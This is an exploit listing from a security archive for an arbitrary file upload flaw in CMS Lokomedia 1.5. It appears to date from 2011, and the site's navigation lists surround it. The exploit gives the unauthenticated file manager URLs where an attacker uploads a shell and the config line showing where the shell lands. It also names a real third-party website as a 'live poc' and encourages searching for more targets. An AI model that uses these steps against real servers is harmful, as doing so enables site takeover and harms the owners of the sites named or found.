CMS Lokomedia 1.5 Shell Upload

CMS Lokomedia 1.5 Shell Upload: Posted Mar 21, 2011; Authored by eidelweiss; CMS Lokomedia version 1.5 suffers from remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 9887ba2dae5c855c073b17ee313676904ca193aba34b95b95ea07aa798342653; Download | Favorite | View

CMS Lokomedia 1.5 Shell Upload

===================================================================
    CMS Lokomedia 1.5 Arbitary file upload vulnerability
===================================================================
   
Software:   CMS Lokomedia
Vendor:     http://bukulokomedia.com/home
Vuln Type:  Arbitary file upload
Download link:  http://bukulokomedia.com/lokomedia-1.5.rar
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
DORK:  use your skill and play your imagination :P

Gratz:
- Kuris : status udah merit aja beib.. kgak undang² iks..
- Richie : RebelgiRL (Limited edition.. lol) live is never flate so enjoy this live mate ^_^


References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
   
   
===================================================================
 

----------------------------------
 
    exploit & p0c

[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html  // upload your file here
    or
[!] http://host/tinymcpuk/filemanager/browser.html
    or
[!] http://host//tinymcpuk/filemanager/frmupload.html
    or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
 
    your shell or file will be placed here
 
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash)    */
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;      // <= here 
/*==============================================================================*/
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */        // <= or here

----------------------------------

  live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
   
   
====================================================================
   
    Nothing Impossible In This World Even Nobody`s Perfect
   
===================================================================
   
==========================| -=[ E0F ]=- |==========================

Top Authors In Last 30 Days

Red Hat 315 files
Ubuntu 65 files
Debian 25 files
LiquidWorm 11 files
Valentin Lobstein 10 files
nu11secur1ty 8 files
Google Security Research 6 files
Milad Karimi 6 files
Yevhenii Butenko 4 files
Jann Horn 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,024)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,473)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,698)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,477)
UNIX (9,394)
UnixWare (187)
Windows (6,653)
Other

CMS Lokomedia 1.5 Shell Upload

CMS Lokomedia 1.5 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMS Lokomedia 1.5 Shell Upload

Share This

CMS Lokomedia 1.5 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems